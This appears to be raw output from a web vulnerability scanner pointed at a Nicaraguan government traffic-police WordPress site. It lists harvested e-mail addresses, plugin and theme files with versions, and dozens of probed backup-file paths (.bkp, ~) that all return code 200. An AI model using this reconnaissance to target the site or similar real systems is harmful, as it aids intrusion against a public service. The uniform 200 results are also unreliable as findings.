- | [+] E-mail Found: info@transitonacional.gob.ni
- | [+] E-mail Found: transitonacional@gmail.com
- | [+] E-mail Found: m@tidakada.com
- |
- | Ignored Files:
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-bn_IN.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ml_IN.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-uk.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-gu_IN.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-bg_BG.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/readme.md
- | http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/pie.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ta.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ca.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-sq.mo
- | http://www.transitonacional.gob.ni/wp-content/themes/newsmag/js/modernizr.min.js?ver=4.4.2
- | http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js?ver=1.8.16
- | http://www.transitonacional.gob.ni/wp-content/themes/newsmag/css/prettyPhoto.css?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-si_LK.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-bs_BA.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.2.2
- | http://www.transitonacional.gob.ni/wp-content/themes/newsmag/js/jquery.flexslider-min.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-admin/css/login.min.css?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/js/slideshow.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-includes/css/buttons.min.css?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-pt_PT.mo
- | http://www.transitonacional.gob.ni/wp-admin/css/install.css?ver=20100228
- | http://www.transitonacional.gob.ni/wp-content/themes/newsmag/css/flexslider.css?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-cs_CZ.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ga_IE.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/exporting/canvg.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-lv.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-es_ES.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.2.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-be_BY.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-bn_BD.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/transito_mapa/transitomapa.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-pl_PL.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/exporting/amexport.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/serial.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-tl.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-sk_SK.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/js/jquery.cycle.all.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-mt_MT.mo
- | http://www.transitonacional.gob.ni/wp-admin/css/ie.min.css?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/exporting/rgbcolor.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-sv_SE.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-el.mo
- | http://www.transitonacional.gob.ni/wp-includes/wlwmanifest.xml
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-vi.mo
- | http://www.transitonacional.gob.ni/wp-includes/js/wp-embed.min.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-th.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/js/transito_grafico.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-admin/css/install.min.css?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-hy_AM.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/exporting/filesaver.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-pa_IN.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-pt_BR.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-mk_MK.mo
- | http://www.transitonacional.gob.ni/wp-includes/css/dashicons.min.css?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-id_ID.mo
- | http://www.transitonacional.gob.ni/wp-includes/js/jquery/jquery.js?ver=1.11.3
- | http://www.transitonacional.gob.ni/wp-includes/js/comment-reply.min.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-nl_NL.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ro_RO.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-gl_ES.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/README.md
- | http://www.transitonacional.gob.ni/wp-content/plugins/tabby-responsive-tabs/js/tabby.js?ver=1.2.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-et.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-hr.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-de_DE.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-af.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-az.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ru_RU.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-zh_CN.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/tabby-responsive-tabs/css/tabby.css?ver=1.2.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ckb.mo
- | http://www.transitonacional.gob.ni/wp-content/themes/newsmag/js/jquery.prettyPhoto.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-sr_RS.mo
- | http://www.transitonacional.gob.ni/wp-content/themes/newsmag/js/customscript.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-sl_SI.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-he_IL.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-da_DK.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ht.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/tabby-responsive-tabs/css/tabby-print.css?ver=1.2.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/js/jquery.touchwipe.1.1.1.js?ver=4.4.2
- | http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js?ver=1.7.1
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-zh_TW.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/css/meteor-slides.css?ver=1.0
- | http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/css/bootstrap-accordion.min.css?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ko_KR.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/amcharts.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-eu.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-tr_TR.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/js/bootstrap-accordion.min.js?ver=1.0
- | http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup/scripts/itro-scripts.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-nb_NO.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ja.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-fa_IR.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-it_IT.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-fr_FR.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/js/jquery.metadata.v2.js?ver=4.4.2
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ar.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-eo_EO.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ka_GE.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-fi.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-lt_LT.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-hi_IN.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ms_MY.mo
- | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-hu_HU.mo
- ======================================================================================================================================
- #######################################################################################################################################
- | Backup Files:
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/update-core.php~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/import.php~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/import.php.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/css.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/css~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/install.php.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/upgrade.php~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/install.php~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/images.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/update-core.php.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/upgrade.php.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/images~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/themes.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/license.txt.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-login.php.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-login.php~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/themes~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/themes/newsmag.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/license.txt~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/feed~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/css~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/feed.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/themes/newsmag~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/xmlrpc.php.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/xmlrpc.php~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/css.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/comments/feed.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/comments/feed~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jquery.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes/css.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/comments~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/comments.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes/css~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jquery~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jquery/1.8.3~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jquery/1.8.3.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jqueryui/1.9.2.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/css~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jqueryui/1.9.2~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/css.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/exporting.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/exporting~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/css.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/js.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jqueryui~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/css~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/js.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/js~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jqueryui.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/js~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/js.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/js~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/quienes-somos.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/quienes-somos~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup/scripts.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-json.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-json~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/mision-y-vision~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/mision-y-vision.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/tramites-y-multas.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/jefatura-de-transito-y-delegaciones~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/tramites-y-multas~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/jefatura-de-transito-y-delegaciones.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup/scripts~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/regimen-de-circulacion-de-vehiculos.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/regimen-de-circulacion-de-vehiculos~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/aranceles-y-especies-fiscales~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/de-la-importacion-de-vehiculos-automotores-arto-164~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/educacion-vial~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/recomendaciones-generales.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/aranceles-y-especies-fiscales.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/educacion-vial.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/educacion-vial/temas-y-contenidos-de-estudio.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/educacion-vial/temas-y-contenidos-de-estudio~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/educacion-vial/prevencion-vial~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/recomendaciones-generales~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/requisito-alumno-egresado-de-escuela-de-manejo~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/de-la-importacion-de-vehiculos-automotores-arto-164.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/educacion-vial/prevencion-vial.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/requisito-alumno-egresado-de-escuela-de-manejo.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/talleres.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/talleres~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/estadisticas.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/planes-de-seguridad.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/ingenieria-vial.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/ingenieria-vial~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2015/07.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/estadisticas~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/tipos-de-accidentes.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/tipos-de-accidentes~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/funcion-de-regulacion-vial.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2015/07~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/funcion-de-regulacion-vial~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/planes-de-seguridad~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/requisitos-y-tramites.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/requisitos-y-tramites~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/boleta-amarilla-y-roja~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/procedimientos-por-tipo-de-accidente.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/suspension-y-cancelacion-de-licencias~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/valor-de-multas-por-infracciones-de-transito.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/valor-de-multas-por-infracciones-de-transito~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/autorizacion-de-escuela-de-manejo-e-instructores~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/boleta-amarilla-y-roja.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/autorizacion-de-escuela-de-manejo-e-instructores.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/procedimientos-por-tipo-de-accidente~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/escuelas-de-manejo-autorizadas.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/escuelas-de-manejo-autorizadas~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2015.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/suspension-y-cancelacion-de-licencias.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2015~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/aranceles-e-infracciones.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/contactanos~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/denuncias~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/contactanos.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/denuncias.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/aranceles-e-infracciones~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1198.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/02.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/author/admin.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/02~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1176.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/08~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1198~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1176~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/08.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/author/admin~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/author.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1162~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1162.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/page/2.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1189~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/author~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1189.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1172.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/page/3.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/page/2~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1172~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/page/3~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/page.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/09.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/09~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/page~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/como-apelar-una-multa~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/como-apelar-una-multa.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/06.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/como-solicitar-mi-licencia-de-conducir-por-primera-vez.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/como-solicitar-mi-licencia-de-conducir-por-primera-vez~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/06~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/donde-me-tengo-que-dirigir-para-hacer-la-inspeccion-mecanica-y-emision-de-gas~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/05.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//platform.twitter.com~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//platform.twitter.com.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/donde-me-tengo-que-dirigir-para-hacer-la-inspeccion-mecanica-y-emision-de-gas.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/05~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1192.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1192~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1160.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1179.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1160~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1195.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1195~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/js.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/js.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1179~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes/js~
